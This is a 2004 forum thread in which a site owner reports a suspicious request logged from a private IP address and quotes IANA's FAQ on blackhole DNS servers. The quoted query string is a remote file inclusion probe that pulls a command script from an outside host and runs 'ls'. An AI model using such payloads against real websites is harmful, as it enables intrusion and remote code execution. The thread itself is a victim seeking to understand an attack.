Heads Up!

Posted: Thu Jul 08, 2004 3:16 pm

Hey everybody,

I got one of those redirect scripts today, it tried to send me to a location I'm not familiar with.

This was the redirect...
[ Only registered users can see links on this board! Get registered or login! ]

I don't know what's there for I didn't go there... i didn't like the cmd part of the URL so I opted not to go.

Anyway, it came from a network I hadn't seen yet as well.

IP 172.16.2.100

Quote:

Forwarded For: 172.16.2.100
Client IP: none
Remote Address: 80.78.110.194
Remote Port: 4573
Request Method: GET
--------------------
Who-Is for IP
172.16.2.100

OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 172.16.0.0 - 172.31.255.255
CIDR: 172.16.0.0/12
NetName: IANA-BBLK-RESERVED
NetHandle: NET-172-16-0-0-1
Parent: NET-172-0-0-0-0
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: This block is reserved for special purposes.
Comment: Please see RFC 1918 for additional information.
Comment:
RegDate: 1994-03-15
Updated: 2002-09-12

OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: [ Only registered users can see links on this board! Get registered or login! ]

OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail: [ Only registered users can see links on this board! Get registered or login! ]

Take it easy everybody.

Dan

Posted: Thu Jul 08, 2004 3:22 pm

Ok, I have an update... but I don't know what it means.

First of all, here's the query string...

Quote:

/index.php?page=http://shirosako.pochta.ru/cmd.php&cmd=ls

Now, to me... that looks just like the redirects I've been getting from the hackers.

I sent a report and received a auto responder saying...

Quote:

Please see the FAQ at the URL below for further
information about your abuse/IP address inquiry.

<http://www.iana.org/faqs/abuse-faq.htm>

If after reading the FAQ you still believe that
your messge was correctly directed to the IANA
please follow the instructions in the FAQ for resending.

So I went to the FAQ and found this...

Quote:

FAQ on "Blackhole Servers"

The following 8 questions/answers contain information regarding the "blackhole" servers:

Q1: What are the blackhole servers?

A1: The "blackhole" Servers, "blackhole-1.iana.org" and "blackhole-2.iana.org", are an obscure part of the Internet infrastructure. People are sometimes puzzled or alarmed to find unexplained references to them in log files or other places. This FAQ tries to explain what these servers do, and why you may be seeing them. Specifically, these servers are part of the Domain Name System (DNS), and respond to inverse queries to addresses in the the reserved RFC 1918 address ranges:

10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255

See: RFC 1918

These addresses are reserved for use on private intranets, and should never appear on the public internet. The 192.168.0.0 addresses are especially common, being frequently used in small office or home networking products like routers, gateways, or firewalls.

Q2. What is "prisoner"

A2. "prisoner" is a blackhole server.

Q3: What are "inverse queries?

A3: With normal ("forward") queries the domain-name system responds with an address (e.g., "192.0.34.162") when given a name are (e.g., "www.iana.org"). Inverse ("reverse") queries do the reverse – the domain name system returns the name ("www.iana.org") when given the address ("192.0.34.162"). While inverse queries are rare from a human perspective, some network services automatically do an inverse lookup whenever they process a request from a particular IP address, and consequently they form a significant part of DNS network traffic.

Q4: Why do we need the blackhole servers?

A4: Strictly speaking, we don't need the blackhole servers. However, DNS clients will sometimes remember the results from previous queries (that is, "good" answers to queries are cached), and the blackhole servers are configured to return answers that DNS clients can cache. This allows the clients to rely on their cached answers, instead of sending another query, which in turn reduces the overall amount of traffic on the Internet. Since the RFC 1918 addresses should never be used on the public Internet, there should be no names in the public DNS that refer to them. Hence, an inverse lookup on one of these addresses should never work. The IANA blackhole servers respond to these inverse queries, and always return an answer that says, authoritatively, that "this address does not exist". Because of the caching noted above, this is far better than simply not responding at all, so the blackhole servers are provided as a public service.

Q5: How busy are the blackhole servers?

A5: While rates vary, the blackhole servers generally answer thousands of queries per second. In the past couple of years the number of queries to the blackhole servers has increased dramatically. It is believed that the large majority of those queries occur because of "leakage" from intranets that are using the RFC 1918 private addresses. This can happen if the private intranet is internally using services that automatically do reverse queries, and the local DNS resolver needs to go outside the intranet to resolve these names. For well-configured intranets, this shouldn't happen. Users of private address space should have their local DNS configured to provide responses to inverse lookups in the private address space.

Q6: But according to my logs the blackhole servers are attacking my network/host. Could it be that a hacker has taken over the blackhole servers, and is attacking other systems?

A6: It is extremely common for logs in consumer firewall products to mistakenly report such attacks, and it is extremely unlikely that the blackhole servers have been taken over by hackers. There are several other far more likely explanations for such log entries. If, for example, your system is configured to pass all outgoing packets, but to block most incoming packets (an extremely common case), then it may be that your DNS client is successfully sending queries to the blackhole servers, but blocking (and logging) the returning answers.

Furthermore, while it is extremely unlikely that hackers have taken over the blackhole servers, it is very common for hackers to disguise their activities by putting RFC 1918 addresses in "spoofed" packets (see the above discussion about spoofed packets).

In fact, because it is so easy to spoof packets one must always take the source (or "return") address with a grain of salt. If the source address is an RFC 1918 address, it is almost certainly the case that either 1) the address is spoofed; or 2) it is coming from your own equipment.

Q7: Is there anything I can do about the messages in my logs?

A7: The best way solve this problem is to set up DNS on your local network. Unfortunately, this can be complicated, and may not in practice be possible. If you are using operating systems from Microsoft, you might want to look at <http://support.microsoft.com/default.aspx?scid=kb;EN-US;q259922>. (Please note that the blackhole servers used to be located at isi.edu).

Q8: Is there anything more than just logs at issue?

A8: Possibly. But you should make every effort to fix the problem from your end, because episodes of overload to the blackhole servers are becoming more common, and that can have more serious consequences. See, for example, <http://www.shmoo.com/mail/fw1/apr99/msg00946.html>.

That's what this was...

Quote:

NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG

So what is the FAQ telling me, what's it mean? Was this not a hacker?

If not who was it?

Thanks a lot.

Dan

Posted: Thu Jul 08, 2004 4:09 pm

10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255

These addresses are reserved for use on private intranets, and should never appear on the public internet. The 192.168.0.0 addresses are especially common, being frequently used in small office or home networking products like routers, gateways, or firewalls.

A VERY short time ago (1 week) there was a russian server that flooded the net with rederection and virus infections after visiting the site and opening a backdoor on the cliënt pc, the server has been blocked and is no longer online, all actions from that group are closely watched so it won't be repeated if possible.